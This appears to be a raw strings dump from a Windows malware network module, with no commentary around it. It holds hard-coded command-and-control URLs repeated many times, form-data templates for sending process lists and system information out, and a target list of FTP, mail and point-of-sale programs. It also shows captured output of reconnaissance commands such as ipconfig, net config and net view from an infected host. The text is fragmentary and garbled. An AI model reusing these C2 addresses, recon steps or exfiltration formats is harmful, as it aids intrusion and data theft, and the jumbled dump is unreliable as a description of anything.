WS2_32.dll ACTIVEDS.dll KERNEL32.dll WideCharToMultiByte DeleteCriticalSection lstrcpyW SetConsoleOutputCP GetSystemDirectoryA HeapCreate GetModuleHandleA LoadLibraryA GetProcAddress HeapFree lstrlenW lstrcpynW MultiByteToWideChar HeapAlloc GetProcessHeap lstrlenA HeapReAlloc ReadFile EnterCriticalSection LeaveCriticalSection InitializeCriticalSection PeekNamedPipe WaitForSingleObject FreeLibraryAndExitThread lstrcatA ExitThread Sleep CreateThread TerminateThread lstrcatW lstrcpyA CloseHandle USER32.dll wvsprintfA wsprintfW ole32.dll CoCreateInstance CoInitializeEx IIDFromString CoSetProxyBlanket CoUninitialize OLEAUT32.dll msvcrt.dll kernel32.dll Wininet.dll _wtoi _snwprintf_s _vsnwprintf_s CreatePipe SetHandleInformation CreateProcessA CreateToolhelp32Snapshot Process32FirstW Process32NextW InternetOpenW InternetConnectW HttpOpenRequestW HttpSendRequestW InternetReadFile InternetCloseHandle networkDll64 ddd5Ř XDUWTFONO_W617601.313667336C1F720D3DAA9B5A6F9B8891 http://203.176.135.102:8082 http://112.78.164.34:8082 http://103.94.122.254:8082 http://170.238.117.187:8082 http://190.100.16.210:8082 http://190.119.180.226:8082 http://96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 handler> /handler> http://203.176.135.102:8082 http://112.78.164.34:8082 http://103.94.122.254:8082 http://170.238.117.187:8082 http://190.100.16.210:8082 http://190.119.180.226:8082 http://96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 ttps:// // 8082 203.176.135.102:8082 http://112.78.164.34:8082 http://103.94.122.254:8082 http://170.238.117.187:8082 http://190.100.16.210:8082 http://190.119.180.226:8082 http://96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 112.78.164.34:8082 http://103.94.122.254:8082 http://170.238.117.187:8082 http://190.100.16.210:8082 http://190.119.180.226:8082 http://96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 103.94.122.254:8082 http://170.238.117.187:8082 http://190.100.16.210:8082 http://190.119.180.226:8082 http://96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 170.238.117.187:8082 http://190.100.16.210:8082 http://190.119.180.226:8082 http://96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 190.100.16.210:8082 http://190.119.180.226:8082 http://96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 190.119.180.226:8082 http://96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 80 96.9.77.142:80 http://96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 96.9.73.73:80 http://36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 36.89.106.69:80 http://177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 177.74.232.124:80 http://103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 103.84.238.3:80 http://195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 443 195.123.219.93:443 http://164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 164.68.96.155:443 http://5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 5.2.64.188:443 http://195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 195.123.216.95:443 http://185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 185.99.2.185:443 http://188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 188.165.62.29:443 http://5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 5.2.78.191:443 http://188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 188.165.62.2:443 http://185.99.2.137:443 http://51.89.115.110:443 185.99.2.137:443 http://51.89.115.110:443 51.89.115.110:443 --%s Content-Disposition: form-data; name="%s" --aksgja8s8d8a8s97 Content-Disposition: form-data; name="proclist" ***TASK LIST*** %s [System Process] System smss.exe csrss.exe wininit.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe audiodg.exe dwm.exe explorer.exe spoolsv.exe taskhost.exe taskeng.exe sppsvc.exe trick_agreements.exe yr-subtle.exe demands.exe ip_lighter.exe asnpartiesexecute.exe viewer.exe rl_occasions.exe governmental.exe mike.exe define-venues.exe sourceslexmarkdetermines.exe role retailers.exe jade.exe posters-optional.exe containers.exe tiles-programme.exe playsecretariat.exe helps.exe 3dftp.exe absolutetelnet.exe alftp.exe barca.exe bitkinex.exe coreftp.exe far.exe filezilla.exe flashfxp.exe fling.exe foxmailincmail.exe gmailnotifierpro.exe icq.exe leechftp.exe ncftp.exe notepad.exe operamail.exe outlook.exe pidgin.exe scriptftp.exe skype.exe smartftp.exe thunderbird.exe totalcmd.exe trillian.exe webdrive.exe whatsapp.exe winscp.exe yahoomessenger.exe active-charge.exe accupos.exe afr38.exe aldelo.exe ccv_server.exe centralcreditcard.exe creditservice.exe edcsvr.exe fpos.exe isspos.exe mxslipstream.exe omnipos.exe spcwin.exe spgagentservice.exe utg2.exe pantyhose_nutrition_replies.exe implies-rose.exe WmiPrvSE.exe dllhost.exe --%s --aksgja8s8d8a8s97 Content-Disposition: form-data; name="%s" Content-Disposition: form-data; name="sysinfo" ***S Y S T E M I N F O*** ROOT\ WQL Name CSName XDUWTFONO tion Caption Microsoft Windows 7 Professional ersion CSDVersion Service Pack 1 hitecture OSArchitecture 64-bit uctType ProductType dType BuildType Multiprocessor Free sDirectory WindowsDirectory irectory SystemDirectory C:\Windows\system32 vice BootDevice \Device\HarddiskVolume1 ialNumber SerialNumber 00371-223-0192745-86989 ate InstallDate 20171201082548.000000+600 otUpTime LastBootUpTime 20200108205919.500000+660 edUser RegisteredUser IPhPgIsahn zQFBUa MLfcdDMkB anization Organization 40KO6YeoIo7 eMemorySize TotalVisibleMemorySize 2096624 ePhysicalMemory FreePhysicalMemory 1430260 HostName: %s HostName: XDUWTFONO OSName: %s OSName: Microsoft Windows 7 Professional OSVersion: %s OSVersion: Service Pack 1 OSArchitecture: %s OSArchitecture: 64-bit ProductType: Workstation BuildType: %s BuildType: Multiprocessor Free RegisteredOwner: %s RegisteredOwner: IPhPgIsahn zQFBUa MLfcdDMkB RegisteredOrg: %s RegisteredOrg: 40KO6YeoIo7 SerialNumber: %s SerialNumber: 00371-223-0192745-86989 InstallDate: %02u/%02u/%04u %02d.%02d.%02d InstallDate: 30/12/1899 00.00.00 LastBootUpTime: %02u/%02u/%04u %02d.%02d.%02d LastBootUpTime: 30/12/1899 00.00.00 WindowsDirectory: %s WindowsDirectory: C:\Windows SystemDirectory: %s SystemDirectory: C:\Windows\system32 BootDevice: %s BootDevice: \Device\HarddiskVolume1 TotalPhysicalMemory: %d Mb TotalPhysicalMemory: 1274 Mb AvailablePhysicalMemory: %d Mb AvailablePhysicalMemory: 1274 Mb ipconfig /all /c ipconfig /all \cmd.exe C:\Windows\system32\cmd.exe %s /c ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : XDuwTfOno Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2 Physical Address. . . . . . . . . : 00-22-45-27-33-99 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::a89e:d7fe:9a2e:2a1e%17(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.0.173(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Wednesday, January 08, 2020 9:01:40 PM Lease Expires . . . . . . . . . . : Friday, January 17, 2020 9:28:53 AM Default Gateway . . . . . . . . . : 192.168.0.1 DHCP Server . . . . . . . . . . . : 192.168.0.1 DHCPv6 IAID . . . . . . . . . . . : 298073543 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-20-C7-5C-A7-C4-3D-C7-58-4A-00 DNS Servers . . . . . . . . . . . : 192.168.0.1 NetBIOS over Tcpip. . . . . . . . : Enabled Tunnel adapter isatap.{ECF237EA-3AD2-4D35-B4FE-425EFF427D86}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Microsoft ISATAP Adapter Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Tunnel adapter Teredo Tunneling Pseudo-Interface: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes c net config workstation /c net config workstation /c net config workstation Computer name \\XDUWTFONO Full Computer name XDuwTfOno User name 5p5NrGJn0jS HALPmcxz Workstation active on NetBT_Tcpip_{ECF237EA-3AD2-4D35-B4FE-425EFF427D86} (002245273399) Software version Windows 7 Professional Workstation domain WORKGROUP Logon domain XDUWTFONO COM Open Timeout (sec) 0 COM Send Count (byte) 16 COM Send Timeout (msec) 250 The command completed successfully. 牥吠灣灩ӫᯗ㧖 net view /all /c net view /all /c net view /all System error 6118 has occurred. The list of servers for this workgroup is not currently available net view /all /domain /c net view /all /domain /c net view /all /domain